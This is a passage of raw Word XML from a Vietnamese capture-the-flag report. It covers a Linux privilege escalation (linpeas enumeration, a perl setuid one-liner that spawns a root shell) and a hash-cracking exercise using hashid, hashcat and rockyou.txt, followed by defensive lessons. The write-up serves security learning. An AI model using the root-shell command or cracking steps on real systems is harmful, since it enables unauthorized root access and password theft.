                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5134692" cy="1714739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57571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au khi login vào được user hatter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5E7C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Tải linpeas.sh để phân tích máy chủ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688800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60258C0F" wp14:editId="1B7B1104">
            <wp:extent cx="5381666" cy="3282431"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5381666" cy="3282431"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA446C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5B4879B4" wp14:editId="0671D186">
            <wp:extent cx="5115639" cy="838317"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5115639" cy="838317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B85D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ải linpeas.sh về máy chủ 10.10.252.144, chạy linpeas.sh để phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ABBF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0" distB="0" distL="0" distR="0" wp14:anchorId="577FC111" wp14:editId="5B1E9CA4">
            <wp:extent cx="5144218" cy="2715004"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5144218" cy="2715004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="555995F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Quan sát kết quả khi phân tích, chú ý đoạn này, ta thấy có </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>usr/bin/perl,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ta có thể khai ở đây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA4CF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406C15E5" wp14:editId="0D90D5A0">
            <wp:extent cx="5144770" cy="3736975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5144770" cy="3736975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C86B3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0" distB="0" distL="0" distR="0" wp14:anchorId="08601007" wp14:editId="68539928">
            <wp:extent cx="5205413" cy="2096737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5205413" cy="2096737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5E6A3" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/usr/bin/perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DC3E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au khi thực hiện lệnh, ta đã chiếm được quyền root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1096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6A2791B5" wp14:editId="0B0DC877">
            <wp:extent cx="5163271" cy="1247949"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5163271" cy="1247949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="199171E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 tìm được file user.txt, và lấy được flag đầu tiên của thử thách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB967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2AD02C70" wp14:editId="0F4588CD">
            <wp:extent cx="5172797" cy="1676634"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172797" cy="1676634"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5739A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ruy cập vào thư mục của alice, ở đây xem nội dung file root.txt và hoàn thành thử thách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494AA18A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799DD837" wp14:editId="377CBB94">
            <wp:extent cx="5191850" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191850" cy="1333686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2412FC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>3.3.3. Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F91DF2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kiến thức đạt được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FEA2EF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Có hiểu biết về hệ thống phân quyền trên Linux, hiểu về các quyền tài khoản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD7262" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Cách khai thác các lỗ hỏng về phân quyền người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9DEFD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Sử dụng các công cụ như nmap để tìm port đang mở của 1 máy chủ, steghide để giải nén file ẩn, Gobuster để quét các đường dẫn khác trên website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C4B08" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Sử dụng shell linpeas.sh để phân tích máy nạn nhân để tìm lỗ hỏng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E73173" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Kinh nghiệm rút ra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760BD74" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Khi triển khai trang web cần thiết lập ngăn chặn đối với những truy cập vào file của hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550D937" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Tránh mở các port không cần thiết hoặc các port có thể bị khai thác từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A9F729" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Khi phân quyền tài khoản phải xem xét kĩ để tránh bị khai thác leo thang đặc quyền lên quyền root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187BB41E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB99CAB" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BC27AF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc90050789"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.4. Crack the hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="684B3D10" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc90050790"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.4.1. Yêu cầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="29727C8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hử thách này yêu cầu từ các đoạn ký tự đã được hash phải tìm được những đoạn ký tự trước khi hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F5E12" w14:textId="479B0AFA" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc90050791"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.4.2. Công cụ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="5668A00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 hashid để tìm chuẩn hash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFC49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hashcat để tìm chuỗi ký tự trước khi hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5E0D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wordlists rockyou.txt danh sách các mật khẩu thường được dùng nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7EBDD1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc90050792"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.4.3. Các bước thực hiện:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="0844D99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1: lưu các chuỗi ký tự đã được hash vào các file text tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B2C9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Lệnh thực hiện: echo [chuỗi ký tự] &gt;[tên file].txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAC7C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2: tìm chuẩn hash của chuỗi ký tự này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E906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Lệnh thực hiện: hashid -m [tên file].txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D6B65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3: Giải mã chuỗi ký tự trong file đã lưu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D987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lastRenderedPageBreak/>
        <w:t>Lệnh thực hiện: hashcat -m [định dạng hash] -a 0 [file hash] [đường dẫn đến wordlists rockyou.txt]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F194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sk 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F295890"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rPr>
        <w:t>Với chuỗi ký tự “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">48bb6e862e54f2a795ffc4e541caed4d” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003766C1"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Bước 1: lưu chuỗi trong file task1_1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DB6CE"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4734F182" wp14:editId="5521F2C6">
            <wp:extent cx="5731200" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="596900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="540ADB9F"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Bước 2: Tìm chuẩn hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98425F"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126B7B03" wp14:editId="405AD6D7">
            <wp:extent cx="5731200" cy="4064000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4064000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3707A9"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Chuẩn hash: MD5 chế độ hash 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DAD5F"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 xml:space="preserve">Bước 3: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C60DA39"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77F0CB25" wp14:editId="6BAE50DC">
            <wp:extent cx="5731200" cy="5384800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5384800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA085D7"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19610308" wp14:editId="39BE0E2B">
            <wp:extent cx="5731200" cy="5016500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5016500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B4760"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Chuỗi trước khi hash là easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2DDF2D"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4B324D4E" wp14:editId="63CC8053">
            <wp:extent cx="5731200" cy="520700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="520700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7AF1F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0"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Với chuỗi ký tự “CBFDAC6008F9CAB4083784CBD1874F76618D2A97” ta cũng tiến hành 3 bước như trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65EFB5"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3763EBEF" wp14:editId="0F5F0C5D">
            <wp:extent cx="5731200" cy="5359400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5359400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A9DC7A"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4C6A0BC6" wp14:editId="1B52896B">
            <wp:extent cx="5731200" cy="5791200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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2"/>
                    <a:srcRect/>
                    <a:stretch>
